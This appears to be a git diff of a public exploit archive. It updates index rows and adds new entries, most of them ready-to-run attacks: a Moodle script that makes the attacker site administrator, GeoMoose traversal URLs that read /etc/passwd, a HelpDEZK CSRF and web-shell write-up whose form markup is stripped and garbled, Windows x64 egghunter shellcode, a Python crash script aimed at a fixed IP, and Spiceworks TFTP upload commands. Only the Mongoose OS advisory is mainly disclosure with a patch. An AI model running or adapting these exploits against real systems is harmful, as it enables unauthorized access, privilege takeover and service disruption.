Schmidt",php,webapps,0 17871,platforms/hardware/webapps/17871.txt,"Cisco TelePresence SOS-11-010 - Multiple Vulnerabilities",2011-09-19,"Sense of Security",hardware,webapps,0 17872,platforms/php/webapps/17872.txt,"Multiple WordPress Plugins - 'timthumb.php' File Upload",2011-09-19,"Ben Schmidt",php,webapps,0 -17873,platforms/windows/webapps/17873.txt,"SharePoint 2007/2010 and DotNetNuke < 6 - File Disclosure via XEE",2011-09-20,"Nicolas Gregoire",windows,webapps,0 +17873,platforms/windows/webapps/17873.txt,"SharePoint 2007/2010 and DotNetNuke < 6 - File Disclosure (via XEE)",2011-09-20,"Nicolas Gregoire",windows,webapps,0 17874,platforms/hardware/webapps/17874.txt,"Netgear Wireless Cable Modem Gateway - Authentication Bypass / Cross-Site Request Forgery",2011-09-20,"Sense of Security",hardware,webapps,0 17882,platforms/php/webapps/17882.php,"JAKCMS PRO 2.2.5 - Arbitrary File Upload",2011-09-22,EgiX,php,webapps,0 17887,platforms/php/webapps/17887.txt,"WordPress Plugin Link Library 5.2.1 - SQL Injection",2011-09-24,"Miroslav Stampar",php,webapps,0 @@ -25510,7 +25514,7 @@ id,file,description,date,author,platform,type,port 18516,platforms/php/webapps/18516.txt,"phpDenora 1.4.6 - Multiple SQL Injections",2012-02-23,NLSecurity,php,webapps,0 18517,platforms/hardware/webapps/18517.txt,"Snom IP Phone - Privilege Escalation",2012-02-23,"Sense of Security",hardware,webapps,0 18519,platforms/php/webapps/18519.txt,"PHP Gift Registry 1.5.5 - SQL Injection",2012-02-24,G13,php,webapps,0 -18518,platforms/php/webapps/18518.rb,"The Uploader 2.0.4 - (English/Italian) Arbitrary File Upload / Remote Code Execution (Metasploit)",2012-02-23,"Danny Moules",php,webapps,0 +18518,platforms/php/webapps/18518.rb,"The Uploader 2.0.4 (English/Italian) - Arbitrary File Upload / Remote Code Execution (Metasploit)",2012-02-23,"Danny Moules",php,webapps,0 18522,platforms/php/webapps/18522.php,"cPassMan 1.82 - Remote Command Execution",2012-02-25,ls,php,webapps,0 18523,platforms/php/webapps/18523.txt,"webgrind 1.0 - (file Parameter) Local File Inclusion",2012-02-25,LiquidWorm,php,webapps,0 18526,platforms/php/webapps/18526.php,"YVS Image Gallery - SQL Injection",2012-02-25,CorryL,php,webapps,0 @@ -35290,7 +35294,7 @@ id,file,description,date,author,platform,type,port 36970,platforms/php/webapps/36970.txt,"JPM Article Script 6 - 'page2' Parameter SQL Injection",2012-03-16,"Vulnerability Research Laboratory",php,webapps,0 36971,platforms/java/webapps/36971.txt,"JavaBB 0.99 - 'userId' Parameter Cross-Site Scripting",2012-03-18,sonyy,java,webapps,0 36924,platforms/ios/webapps/36924.txt,"PDF Converter & Editor 2.1 iOS - File Inclusion",2015-05-06,Vulnerability-Lab,ios,webapps,0 -36925,platforms/php/webapps/36925.py,"elFinder 2 - Remote Command Execution (Via File Creation)",2015-05-06,"TUNISIAN CYBER",php,webapps,0 +36925,platforms/php/webapps/36925.py,"elFinder 2 - Remote Command Execution (via File Creation)",2015-05-06,"TUNISIAN CYBER",php,webapps,0 36926,platforms/php/webapps/36926.txt,"LeKommerce - 'id' Parameter SQL Injection",2012-03-08,Mazt0r,php,webapps,0 36927,platforms/php/webapps/36927.txt,"ToendaCMS 1.6.2 - setup/index.php site Parameter Traversal Local File Inclusion",2012-03-08,AkaStep,php,webapps,0 36929,platforms/jsp/webapps/36929.txt,"Ilient SysAid 8.5.5 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities",2012-03-08,"Julien Ahrens",jsp,webapps,0 @@ -36817,7 +36821,7 @@ id,file,description,date,author,platform,type,port 39821,platforms/python/webapps/39821.txt,"Web2py 2.14.5 - Multiple Vulnerabilities",2016-05-16,"Narendra Bhati",python,webapps,0 39822,platforms/multiple/webapps/39822.rb,"Meteocontrol WEB’log - Admin Password Disclosure (Metasploit)",2016-05-17,"Karn Ganeshen",multiple,webapps,0 39837,platforms/java/webapps/39837.txt,"SAP xMII 15.0 - Directory Traversal",2016-05-17,ERPScan,java,webapps,0 -39838,platforms/php/webapps/39838.php,"Magento < 2.0.6 - Unauthenticated Arbitrary Unserialize -> Arbitrary Write File",2016-05-18,agix,php,webapps,80 +39838,platforms/php/webapps/39838.php,"Magento < 2.0.6 - Unauthenticated Arbitrary Unserialize / Arbitrary Write File",2016-05-18,agix,php,webapps,80 39840,platforms/xml/webapps/39840.txt,"SAP NetWeaver AS JAVA 7.1 < 7.5 - SQL Injection",2016-05-19,ERPScan,xml,webapps,0 39841,platforms/xml/webapps/39841.txt,"SAP NetWeaver AS JAVA 7.1 < 7.5 - Information Disclosure",2016-05-19,ERPScan,xml,webapps,0 39848,platforms/php/webapps/39848.py,"WordPress Plugin Job Script by Scubez - Remote Code Execution",2016-05-23,"Bikramaditya Guha",php,webapps,80 @@ -36939,7 +36943,7 @@ id,file,description,date,author,platform,type,port 40114,platforms/php/webapps/40114.py,"vBulletin 5.x/4.x - Authenticated Persistent Cross-Site Scripting in AdminCP/ApiLog via xmlrpc API",2014-10-12,tintinweb,php,webapps,0 40115,platforms/php/webapps/40115.py,"vBulletin 4.x - Authenticated SQL Injection in breadcrumbs via xmlrpc API",2014-10-12,tintinweb,php,webapps,0 40193,platforms/php/webapps/40193.txt,"Open Upload 0.4.2 - Cross-Site Request Forgery (Add Admin)",2016-08-02,"Vinesh Redkar",php,webapps,80 -40171,platforms/linux/webapps/40171.txt,"AXIS Multiple Products - Authenticated Remote Command Execution via devtools Vector",2016-07-29,Orwelllabs,linux,webapps,80 +40171,platforms/linux/webapps/40171.txt,"AXIS Multiple Products - 'devtools ' Authenticated Remote Command Execution",2016-07-29,Orwelllabs,linux,webapps,80 40126,platforms/php/webapps/40126.txt,"NewsP Free News Script 1.4.7 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",php,webapps,80 40127,platforms/php/webapps/40127.txt,"newsp.eu PHP Calendar Script 1.0 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",php,webapps,80 40129,platforms/python/webapps/40129.txt,"Django CMS 3.3.0 - (Editor Snippet) Persistent Cross-Site Scripting",2016-07-20,Vulnerability-Lab,python,webapps,80 @@ -37694,3 +37698,6 @@ id,file,description,date,author,platform,type,port 41819,platforms/php/webapps/41819.txt,"Sweepstakes Pro Software - SQL Injection",2017-04-05,"Ihsan Sencan",php,webapps,0 41820,platforms/php/webapps/41820.txt,"Appointment Script - SQL Injection",2017-04-05,"Ihsan Sencan",php,webapps,0 41821,platforms/hardware/webapps/41821.txt,"D-Link DIR-615 - Cross-Site Request Forgery",2017-04-05,"Pratik S. Shah",hardware,webapps,0 +41822,platforms/php/webapps/41822.txt,"GeoMoose < 2.9.2 - Directory Traversal",2017-04-03,"Sander Ferdinand",php,webapps,0 +41828,platforms/php/webapps/41828.php,"Moodle 2.x/3.x - SQL Injection",2017-04-06,"Marko Belzetski",php,webapps,0 +41824,platforms/php/webapps/41824.txt,"HelpDEZK 1.1.1 - Cross-Site Request Forgery / Code Execution",2017-04-05,rungga_reksya,php,webapps,0 diff --git a/platforms/hardware/dos/41826.txt b/platforms/hardware/dos/41826.txt new file mode 100755 index 000000000..3f34c664d --- /dev/null +++ b/platforms/hardware/dos/41826.txt @@ -0,0 +1,208 @@ +############################################################# +# +# COMPASS SECURITY ADVISORY +# https://www.compass-security.com/en/research/advisories/ +# +############################################################# +# +# Product: Mongoose OS +# Vendor: Cesanta +# CVE ID: CVE-2017-7185 +# CSNC ID: CSNC-2017-003 +# Subject: Use-after-free / Denial of Service +# Risk: Medium +# Effect: Remotely exploitable +# Authors: +# Philipp Promeuschel +# Carel van Rooyen +# Stephan Sekula +# Date: 2017-04-03 +# +############################################################# + +Introduction: +------------- +Cesanta's Mongoose OS [1] - an open source operating system for the Internet of Things. Supported micro controllers: +* ESP32 +* ESP8266 +* STM32 +* TI CC3200 + +Additionally, Amazon AWS IoT is integrated for Cloud connectivity. Developers can write applications in C or JavaScript (the latter by using the v7 component of Mongoose OS). + +Affected versions: +--------- +Vulnerable: + * <= Release 1.2 +Not vulnerable: + * Patched in current dev / master branch +Not tested: + * N/A + +Technical Description +--------------------- +The handling of HTTP-Multipart boundary [3] headers does not properly close connections when malformed requests are sent to the Mongoose server. +This leads to a use-after-free/null-pointer-de-reference vulnerability, causing the Mongoose HTTP server to crash. As a result, the entire system is rendered unusable. + + +The mg_parse_multipart [2] function performs proper checks for empty boundaries, but, since the flag "MG_F_CLOSE_IMMEDIATELY" does not have any effect, mg_http_multipart_continue() is called: +--------------->8--------------- +void mg_http_handler(struct mg_connection *nc, int ev, void *ev_data) { +[CUT BY COMPASS] + #if MG_ENABLE_HTTP_STREAMING_MULTIPART + if (req_len > 0 && (s = mg_get_http_header(hm, "Content-Type")) != NULL && + s->len >= 9 && strncmp(s->p, "multipart", 9) == 0) { + mg_http_multipart_begin(nc, hm, req_len); // properly checks for empty boundary + // however, the socket is not closed, and mg_http_multipart_continue() is executed + mg_http_multipart_continue(nc); + return; +} +---------------8<--------------- +In the mg_http_multipart_begin function, the boundary is correctly verified: +--------------->8--------------- + boundary_len = + mg_http_parse_header(ct, "boundary", boundary, sizeof(boundary)); + + if (boundary_len == 0) { + /* + * Content type is multipart, but there is no boundary, + * probably malformed request + */ + nc->flags = MG_F_CLOSE_IMMEDIATELY; + DBG(("invalid request")); + goto exit_mp; + } +---------------8<--------------- +However, the socket is not closed (even though the flag "MG_F_CLOSE_IMMEDIATELY" has been set), and mg_http_multipart_continue is executed. +In mg_http_multipart_continue(), the method mg_http_multipart_wait_for_boundary() is executed: +---------------8<--------------- +static void mg_http_multipart_continue(struct mg_connection *c) { + struct mg_http_proto_data *pd = mg_http_get_proto_data(c); + while (1) { + switch (pd->mp_stream.state) { + case MPS_BEGIN: { + pd->mp_stream.state = MPS_WAITING_FOR_BOUNDARY; + break; + } + case MPS_WAITING_FOR_BOUNDARY: { + if (mg_http_multipart_wait_for_boundary(c) == 0) { + return; + } + break; + } +--------------->8--------------- +Then, mg_http_multipart_wait_for_boundary() tries to identify the boundary-string. However, this string has never been initialized, which causes c_strnstr to crash. +---------------8<--------------- +static int mg_http_multipart_wait_for_boundary(struct mg_connection *c) { + const char *boundary; + struct mbuf *io = &c->recv_mbuf; + struct mg_http_proto_data *pd = mg_http_get_proto_data(c); + + if ((int) io->len < pd->mp_stream.boundary_len + 2) { + return 0; + } + + boundary = c_strnstr(io->buf, pd->mp_stream.boundary, io->len); + if (boundary != NULL) { +[CUT BY COMPASS] +--------------->8--------------- + + +Steps to reproduce +----------------- +Request to HTTP server (code running on hardware device): +---------------8<--------------- +POST / HTTP/1.1 +Connection: keep-alive +Content-Type: multipart/form-data; +Content-Length: 1 +1 +--------------->8--------------- +The above request results in a stack trace on the mongoose console: +---------------8<--------------- +Guru Meditation Error of type LoadProhibited occurred on core 0. Exception was unhandled. +Register dump: +PC : 0x400014fd PS : 0x00060330 A0 : 0x801114b4 A1 : 0x3ffbfcf0 +A2 : 0x00000000 A3 : 0xfffffffc A4 : 0x000000ff A5 : 0x0000ff00 +A6 : 0x00ff0000 A7 : 0xff000000 A8 : 0x00000000 A9 : 0x00000085 +A10 : 0xcccccccc A11 : 0x0ccccccc A12 : 0x00000001 A13 : 0x00000000 +A14 : 0x00000037 A15 : 0x3ffbb3cc SAR : 0x0000000f EXCCAUSE: 0x0000001c +EXCVADDR: 0x00000000 LBEG : 0x400014fd LEND : 0x4000150d LCOUNT : 0xffffffff + +Backtrace: 0x400014fd:0x3ffbfcf0 0x401114b4:0x3ffbfd00 0x401136cc:0x3ffbfd30 0x401149ac:0x3ffbfe30 0x40114b71:0x3ffbff00 0x40112b80:0x3ffc00a0 0x40112dc6:0x3ffc00d0 0x40113295:0x3ffc0100 0x4011361a:0x3ffc0170 0x40111716:0x3ffc01d0 0x40103b8f:0x3ffc01f0 0x40105099:0x3ffc0210 +--------------->8--------------- + + +Further debugging shows that an uninitialized string has indeed been passed to c_strnstr: +---------------8<--------------- +(gdb) info symbol 0x401114b4 +c_strnstr + 12 in section .flash.text +(gdb) list *0x401114b4 +0x401114b4 is in c_strnstr (/mongoose-os/mongoose/mongoose.c:1720). +warning: Source file is more recent than executable. +1715 } +1716 #endif /* _WIN32 */ +1717 +1718 /* The simplest O(mn) algorithm. Better implementation are GPLed */ +1719 const char *c_strnstr(const char *s, const char *find, size_t slen) WEAK; +1720 const char *c_strnstr(const char *s, const char *find, size_t slen) { +1721 size_t find_length = strlen(find); +1722 size_t i; +1723 +1724 for (i = 0; i < slen; i++) { +(gdb) list *0x401136cc +0x401136cc is in mg_http_multipart_continue (/mongoose-os/mongoose/mongoose.c:5893). +5888 mg_http_free_proto_data_mp_stream(&pd->mp_stream); +5889 pd->mp_stream.state = MPS_FINISHED; +5890 +5891 return 1; +5892 } +5893 +5894 static int mg_http_multipart_wait_for_boundary(struct mg_connection *c) { +5895 const char *boundary; +5896 struct mbuf *io = &c->recv_mbuf; +5897 struct mg_http_proto_data *pd = mg_http_get_proto_data(c); +(gdb) +--------------->8--------------- + +Workaround / Fix: +----------------- +Apply the following (tested and confirmed) patch: +---------------8<--------------- +$ diff --git a/mongoose/mongoose.c b/mongoose/mongoose.c +index 91dc8b9..063f8c6 100644 +--- a/mongoose/mongoose.c ++++ b/mongoose/mongoose.c +@@ -5889,6 +5889,12 @@ static int mg_http_multipart_wait_for_boundary(struct mg_connection *c) { + return 0; + } + ++ if(pd->mp_stream.boundary == NULL){ ++ pd->mp_stream.state = MPS_FINALIZE; ++ LOG(LL_INFO, ("invalid request: boundary not initialized")); ++ return 0; ++ } ++ + boundary = c_strnstr(io->buf, pd->mp_stream.boundary, io->len); + if (boundary != NULL) { + const char *boundary_end = (boundary + pd->mp_stream.boundary_len); +--------------->8--------------- +The patch has been merged into Mongoose OS on github.com on 2017-04-03 [4] + +Timeline: +--------- +2017-04-03: Coordinated public disclosure date +2017-04-03: Release of patch +2017-03-20: Initial vendor response, code usage sign-off +2017-03-19: Initial vendor notification +2017-03-19: Assigned CVE-2017-7185 +2017-03-11: Confirmation and patching Philipp Promeuschel, Carel van Rooyen +2017-03-08: Initial inspection Philipp Promeuschel, Carel van Rooyen +2017-03-08: Discovery by Philipp Promeuschel + +References: +----------- +[1] https://www.cesanta.com/ +[2] https://github.com/cesanta/mongoose/blob/66a96410d4336c312de32b1cf5db954aab9ee2ec/mongoose.c#L7760 +[3] http://www.ietf.org/rfc/rfc2046.txt +[4] https://github.com/cesanta/mongoose-os/commit/042eb437973a202d00589b13d628181c6de5cf5b \ No newline at end of file diff --git a/platforms/php/webapps/41822.txt b/platforms/php/webapps/41822.txt new file mode 100755 index 000000000..e381ad272 --- /dev/null +++ b/platforms/php/webapps/41822.txt @@ -0,0 +1,15 @@ +# Exploit Title: GeoMoose <= 2.9.2 Local File Disclosure +# Exploit Author: Sander 'dsc' Ferdinand +# Date: 2017-03-4 +# Version: <= 2.9.2 +# Blog: https://ced.pwned.systems/advisories-geomoose-local-file-disclosure-2-9-2.html +# Vendor Homepage: geomoose.org +# Reported: 4-3-2017 +# Vendor response: http://osgeo-org.1560.x6.nabble.com/Geomoose-users-GeoMoose-Security-Issue-td5315873.html +# Software Link: https://github.com/geomoose/geomoose +# Tested on: Windows/Linux +# CVE : none + +/php/download.php?id=foo/.&ext=/../../../../../../../etc/passwd +/php/download.php?id=foo/.&ext=/../../../../../../../WINDOWS/system32/drivers/etc/hosts + diff --git a/platforms/php/webapps/41824.txt b/platforms/php/webapps/41824.txt new file mode 100755 index 000000000..9a5105b1d --- /dev/null +++ b/platforms/php/webapps/41824.txt @@ -0,0 +1,213 @@ +# Exploit Title: Multiple CSRF Remote Code Execution Vulnerability on HelpDEZK 1.1.1 +# Date: 05-April-2017 +# Exploit Author: @rungga_reksya, @yokoacc, @AdyWikradinata, @dickysofficial, @dvnrcy +# Vendor Homepage: http://www.helpdezk.org/ +# Software Link: https://codeload.github.com/albandes/helpdezk/zip/v1.1.1 +# Version: 1.1.1 +# Tested on: Windows Server 2012 Datacenter Evaluation +# CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N (9.1 - CRITICAL)# CVE: CVE-2017-7446 and CVE-2017-7447 + +I. Background: +HelpDEZk is a powerfull software that manages requests/incidents. It has all the needed requirements to an efficient workflow management of all processes involved in service execution. This control is done for internal demands and also for outsourced services. HelpDEZk can be used at any company's area, serving as an support to the shared service center concept, beyond the ability to log all the processes and maintain the request's history, it can pass it through many approval levels. HelpDEZk can put together advanced managing resources with an extremely easy use. Simple and intuitive screens make the day-by-day easier for your team, speeding up the procedures and saving up a lot of time. It is developped in objects oriented PHP language, with the MVC architecture and uses the templates system SMARTY. For the javascripts, JQUERY is used. + +II. Description: +Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application. + +HelpDEZK have role for type person: + +admin = 1 +user = 2 +operator = 3 +costumer = 4 +partner = 5 +group = 6 + + +III. Exploit: + +—> The first CSRF Target is: “/admin/home#/person/” +(Admin - Records - People & Companies) + +The guest (no have account) can make admin privilege with CSRF Remote Code Execution. This is script for make account admin: + +  +  +   
+      +        +      +      +      +      +      +      +      +      +      +      +      +      +      +      +      +      +      +      +      +      +      +      +      +      +      +      +      +      +   
+  + + +—> The second CSRF target is: /admin/home#/logos/ +(Admin - Config - Logos) +If we have minimum low privilege, we can remote code execute to make shell on module logos (Position of Page Header, Login Page and Reports Logo). The HelpDEZK unrestricted file extension but normally access only for admin. + +If you have low privilege, please choose which one to execute this code (before execute, you shall login into application):
 + + +  +    +   
+      +   
+  + + +———— +  + +  +    +   
+      +   
+  + + +——————— +  + +  +    +   
+      +   
+  + + +———— +If you have executed and success, check your file on: +http://example.com/helpdezk-1.1.1/app/uploads/logos/ + +and PWN ^_^ +http://example.com/helpdezk-1.1.1/app/uploads/logos/login_index.php?cmd=ipconfig +IV. Thanks to: +- Alloh SWT +- MyBoboboy +- Komunitas IT Auditor & IT Security + + +Refer: +https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF) +https://www.owasp.org/index.php/Testing_for_Privilege_escalation_(OTG-AUTHZ-003)http://rungga.blogspot.co.id/2017/04/multiple-csrf-remote-code-execution.html +https://github.com/albandes/helpdezk/issues/2 + diff --git a/platforms/php/webapps/41828.php b/platforms/php/webapps/41828.php new file mode 100755 index 000000000..5a6ad0575 --- /dev/null +++ b/platforms/php/webapps/41828.php @@ -0,0 +1,134 @@ +# Exploit: Moodle SQL Injection via Object Injection Through User Preferences +# Date: April 6th, 2017 +# Exploit Author: Marko Belzetski +# Contact: mbelzetski@protonmail.com +# Vendor Homepage: https://moodle.org/ +# Version: 3.2 to 3.2.1, 3.1 to 3.1.4, 3.0 to 3.0.8, 2.7.0 to 2.7.18 and other unsupported versions +# Tested on: Moodle 3.2 running on php7.0 on Ubuntu 16.04 +# CVE : CVE-2017-2641 + +1. Description +In Moodle 3.2 to 3.2.1, 3.1 to 3.1.4, 3.0 to 3.0.8, 2.7.0 to 2.7.18 and other unsupported versions, any registered user can update any table of the Moodle database via an objection injection through a legacy user preferences setting (Described by Netanel Rubin at http://netanelrub.in/2017/03/20/moodle-remote-code-execution/) + +2. PoC +Log in as a regular user and note the URL of the Moodle site, the 'MoodleSession' cookie value and the 'sesskey' parameter along with your 'userid' from the page source. Paste these values into the exploit script, fire the script, re-authenticate and you will be the site administrator. + + grade = new grade_grade(); + $fb -> grade -> grade_item = new grade_item(); + $fb -> grade -> grade_item -> calculation = "[[somestring"; + $fb -> grade -> grade_item -> calculation_normalized = false; + + //setting the table which we want to alter + $fb -> grade -> grade_item -> table = $table; + //setting the row id of the row that we want to alter + $fb -> grade -> grade_item -> id = $rowId; + //setting the column with the value that we want to insert + $fb -> grade -> grade_item -> $column = $value; + $fb -> grade -> grade_item -> required_fields = array($column,'id'); + + //creating the array with our base object (which itself is included in an array because the base object has no __tostring() method) and our payload object + $arr = array(array($base),$fb); + + //serializing the array + $value = serialize($arr); + + //we'll set the course_blocks sortorder to 0 so we default to legacy user preference + $data = array('sesskey' => $sesskey, 'sortorder[]' => 0); + httpPost($url. '/blocks/course_overview/save.php',$data, $MoodleSession,0); + + //injecting the payload + $data = json_encode(array(array('index'=> 0, 'methodname'=>'core_user_update_user_preferences','args'=>array('preferences'=>array(array('type'=> 'course_overview_course_order', 'value' => $value)))))); + httpPost($url.'/lib/ajax/service.php?sesskey='.$sesskey, $data, $MoodleSession,1); + + //getting the frontpage so the payload will activate + httpGet($url.'/my/', $MoodleSession); + } + +$url = ''; //url of the Moodle site +$MoodleSession = '' //your MoodleSession cookie value +$sesskey = ''; //your sesskey + +$table = "config"; //table to update +$rowId = 25; // row id to insert into. 25 is the row that sets the 'siteadmins' parameter. could vary from installation to installation +$column = 'value'; //column name to update, which holds the userid +$value = 3; // userid to set as 'siteadmins' Probably want to make it your own + +update_table($url, $MoodleSession,$sesskey,$table,$rowId,$column, $value); + +//reset the allversionshash config entry with a sha1 hash so the site reloads its configuration +$rowId = 375 // row id of 'allversionshash' parameter +update_table($url, $MoodleSession,$sesskey,$table,$rowId, $column, sha1(time())); + +//reset the sortorder so we can see the front page again without the payload triggering +$data = array('sesskey' => $sesskey, 'sortorder[]' => 1); +httpPost($url. '/blocks/course_overview/save.php',$data, $MoodleSession,0); + +//force plugincheck so we can access admin panel +httpGet($url.'/admin/index.php?cache=0&confirmplugincheck=1',$MoodleSession); + +} +?> + + +3. Solution: +Upgrade to fixed Moodle versions: 3.2.2, 3.1.5, 3.0.9 or 2.7.19 diff --git a/platforms/win_x86-64/shellcode/41827.txt b/platforms/win_x86-64/shellcode/41827.txt new file mode 100755 index 000000000..72df1e4db --- /dev/null +++ b/platforms/win_x86-64/shellcode/41827.txt @@ -0,0 +1,43 @@ +PUBLIC Win10egghunterx64 + +.code + +Win10egghunterx64 PROC + +_start: + push 7fh + pop rdi ; RDI is nonvolatile, so it will be preserved after syscalls + +_setup: + inc rdi ; parameter 1 - lpAddress - counter + mov r9b,40h ; parameter 3 - flNewProtect - 0x40 PAGE_EXECUTE_READWRITE + pop rsi ; Stack alignment before the stack setup + pop rsi + push rdi + push rsp + pop rdx ; pointer to lpAddress + push 08h ; parameter 2 - dwSize 0x8 + push rsp + pop r8 ; pointer to dwSize going to r8 - can be exchanged with mov r8,rsp + mov [rdx+20h],rsp ; parameter 4 - lpflOldprotect + dec r10 ; parameter 5 - hProcess - the handle will be -1, if not set you'll get a c0000008 error +_VirtualProtectEx: + + push 50h ; 0x50h for Windows 10 and Windows Server 2016 x64, 0x4Dh for Windows 7 family + pop rax + syscall + +_rc_check: + + cmp al,01h ; check the response for non-allocated memory + jge _setup + +_end: ; There won't be too many of these eggs in the memory + + mov eax, 042303042h ; the egg + scasd + jnz _setup + jmp rdi + +Win10egghunterx64 ENDP +END \ No newline at end of file diff --git a/platforms/windows/dos/41823.py b/platforms/windows/dos/41823.py new file mode 100755 index 000000000..e4105585b --- /dev/null +++ b/platforms/windows/dos/41823.py @@ -0,0 +1,42 @@ +import socket +import binascii +import time +import struct + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +s.settimeout(1) +s.connect(("10.101.0.85", 8400)) + +def sr(p=None, r=None): + if p: + print "sending %d bytes: %s " % (len(p)/2,p) + payl = binascii.a2b_hex(p) + s.send(payl) + if r: + data = s.recv(1024*2) + print "received %d bytes: %s " % (len(data),binascii.b2a_hex(data)) + + + + +pkt1 = "0000003800000010000000100000000f00000000000000000000000000000000000000000000000000000000000000010000000000000000" +pkt1 += "0000100309000101090000000000ffe80000000800010000" +pkt1 += "0000000400000004" + +pkt2 = "0000100309000509000000090000ffe800000036"+"00018016" +pkt2 += "02000000"+"09050009"+"c14d4d0"+"000000000000000003a793102076376642e6578656a231a0200429d750500989796059c16e042"+"fd00b417" + + +pkt3 = "53534c634c6e54"+"01"+"000b"+"77696e323031322d303200"+"03"+"0000000300000001" +p = "41"*0xd0 +pkt3 += p + +sr(pkt1,1) +sr(pkt2,1) +sr(pkt3,1) +exit() + + + + +s.close() diff --git a/platforms/windows/remote/41825.txt b/platforms/windows/remote/41825.txt new file mode 100755 index 000000000..eb9178b07 --- /dev/null +++ b/platforms/windows/remote/41825.txt @@ -0,0 +1,104 @@ +[+] Credits: John Page AKA HYP3RLINX +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/SPICEWORKS-IMPROPER-ACCESS-CONTROL-FILE-OVERWRITE.txt +[+] ISR: APPARITIONSEC + + + +Vendor: +================== +www.spiceworks.com + + + +Product: +================= +Spiceworks - 7.5 + + +Provides network inventory and monitoring of all the devices on the network by discovering IP-addressable devices. +It can be configured to provide custom alerts and notifications based on various criteria. it also provides a ticketing system, +a user portal, an integrated knowledge base, and mobile ticket management. + + + +Vulnerability Type: +============================================== +Improper Access Control File Overwrite / Upload + + + +CVE Reference: +============== +CVE-2017-7237 + + + +Security Issue: +================ +The Spiceworks TFTP Server, as distributed with Spiceworks Inventory 7.5, allows remote attackers to access the Spiceworks "data\configurations" +directory by leveraging the unauthenticated nature of the TFTP service for all clients who can reach UDP port 69. This allows remote attackers to +overwrite files within the Spiceworks configurations directory, if the targeted file name is known or guessed. + +Remote attackers who can reach UDP port 69 can also write/upload arbitrary files to the "data\configurations", this can potentially become a +Remote Code Execution vulnerability if for example an executable file e.g. EXE, BAT is dropped, then later accessed and run by an unknowing +Spiceworks user. + + + + +References - released April 3, 2017: +==================================== +https://community.spiceworks.com/support/inventory/docs/network-config#security + + + +Proof: +======= + +1) Install Spiceworks +2) c:\>tftp -i VICTIM-IP PUT someconfig someconfig +3) Original someconfig gets overwritten + +OR + +Arbitrary file upload +c:\>tftp -i VICTIM-IP PUT Evil.exe Evil.exe + + + + +Network Access: +=============== +Remote + + + + +Severity: +========= +High + + + + +Disclosure Timeline: +====================================================================== +Vendor Notification: March 13, 2017 +Sent vendor e.g. POC : March 23, 2017 +Request status : March 30, 2017 +Vendor reply: "We are still working on this" March 30, 2017 +Vendor reply :"Thanks for bringing this to our attention" +and releases basic security note of issue on website : April 3, 2017 +April 5, 2017 : Public Disclosure + + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). \ No newline at end of file